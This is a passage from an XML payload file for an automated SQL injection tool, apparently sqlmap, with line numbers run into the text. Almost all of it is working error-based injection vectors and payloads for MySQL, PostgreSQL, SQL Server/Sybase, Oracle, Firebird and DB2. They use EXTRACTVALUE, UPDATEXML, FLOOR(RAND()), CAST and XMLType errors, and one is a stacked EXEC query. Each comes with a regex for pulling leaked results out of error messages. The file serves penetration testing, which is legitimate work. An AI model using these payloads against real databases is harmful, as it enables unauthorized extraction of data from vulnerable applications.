COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>1323<request>1324<payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>1325</request>1326<response>1327<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1328</response>1329<details>1330<dbms>MySQL</dbms>1331<dbms_version>>= 5.0</dbms_version>1332</details>1333</test>13341335<test>1336<title>MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>1337<stype>2</stype>1338<level>3</level>1339<risk>1</risk>1340<clause>2,3</clause>1341<where>1</where>1342<vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>1343<request>1344<payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT 
(ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>1345</request>1346<response>1347<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1348</response>1349<details>1350<dbms>MySQL</dbms>1351<dbms_version>>= 5.1</dbms_version>1352</details>1353</test>13541355<test>1356<title>MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)</title>1357<stype>2</stype>1358<level>5</level>1359<risk>1</risk>1360<clause>2,3</clause>1361<where>1</where>1362<vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>1363<request>1364<payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>1365</request>1366<response>1367<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1368</response>1369<details>1370<dbms>MySQL</dbms>1371<dbms_version>>= 5.1</dbms_version>1372</details>1373</test>13741375<test>1376<title>MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>1377<stype>2</stype>1378<level>3</level>1379<risk>1</risk>1380<clause>2,3</clause>1381<where>1</where>1382<vector>,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</vector>1383<request>1384<payload>,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</payload>1385</request>1386<response>1387<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1388</response>1389<details>1390<dbms>MySQL</dbms>1391<dbms_version>>= 4.1</dbms_version>1392</details>1393</test>13941395<test>1396<title>PostgreSQL 
error-based - ORDER BY, GROUP BY clause</title>1397<stype>2</stype>1398<level>3</level>1399<risk>1</risk>1400<clause>2,3</clause>1401<where>1</where>1402<vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>1403<request>1404<payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>1405</request>1406<response>1407<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1408</response>1409<details>1410<dbms>PostgreSQL</dbms>1411</details>1412</test>14131414<test>1415<title>PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)</title>1416<stype>2</stype>1417<level>5</level>1418<risk>1</risk>1419<clause>2,3</clause>1420<where>1</where>1421<vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>1422<request>1423<payload>,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>1424</request>1425<response>1426<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1427</response>1428<details>1429<dbms>PostgreSQL</dbms>1430</details>1431</test>14321433<test>1434<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>1435<stype>2</stype>1436<level>4</level>1437<risk>1</risk>1438<clause>3</clause>1439<where>1</where>1440<vector>,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>1441<request>1442<payload>,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>1443</request>1444<response>1445<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1446</response>1447<details>1448<dbms>Microsoft SQL 
Server</dbms>1449<dbms>Sybase</dbms>1450</details>1451</test>14521453<test>1454<title>Oracle error-based - ORDER BY, GROUP BY clause</title>1455<stype>2</stype>1456<level>4</level>1457<risk>1</risk>1458<clause>2,3</clause>1459<where>1</where>1460<vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>1461<request>1462<payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>1463</request>1464<response>1465<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1466</response>1467<details>1468<dbms>Oracle</dbms>1469</details>1470</test>14711472<test>1473<title>Firebird error-based - ORDER BY clause</title>1474<stype>2</stype>1475<level>5</level>1476<risk>1</risk>1477<clause>3</clause>1478<where>1</where>1479<vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>1480<request>1481<payload>,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>1482</request>1483<response>1484<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1485</response>1486<details>1487<dbms>Firebird</dbms>1488</details>1489</test>14901491<test>1492<title>IBM DB2 error-based - ORDER BY clause</title>1493<stype>2</stype>1494<level>5</level>1495<risk>1</risk>1496<clause>3</clause>1497<where>1</where>1498<vector>,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>1499<request>1500<payload>,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM 
SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>1501</request>1502<response>1503<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1504</response>1505<details>1506<dbms>IBM DB2</dbms>1507</details>1508</test>1509<!--1510TODO: if possible, add payload for SQLite, Microsoft Access,1511and SAP MaxDB - no known techniques at this time1512-->1513<!-- End of error-based tests - ORDER BY, GROUP BY clause -->15141515<!-- Error-based tests - stacking -->1516<test>1517<title>Microsoft SQL Server/Sybase error-based - Stacking (EXEC)</title>1518<stype>2</stype>1519<level>2</level>1520<risk>1</risk>1521<clause>1-8</clause>1522<where>1</where>1523<vector>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]</vector>1524<request>1525<payload>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]</payload>1526<comment>--</comment>1527</request>1528<response>1529<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1530</response>1531<details>1532<dbms>Microsoft SQL Server</dbms>1533<dbms>Sybase</dbms>1534</details>1535</test>1536<!-- End of error-based tests - stacking -->1537</root>153815391540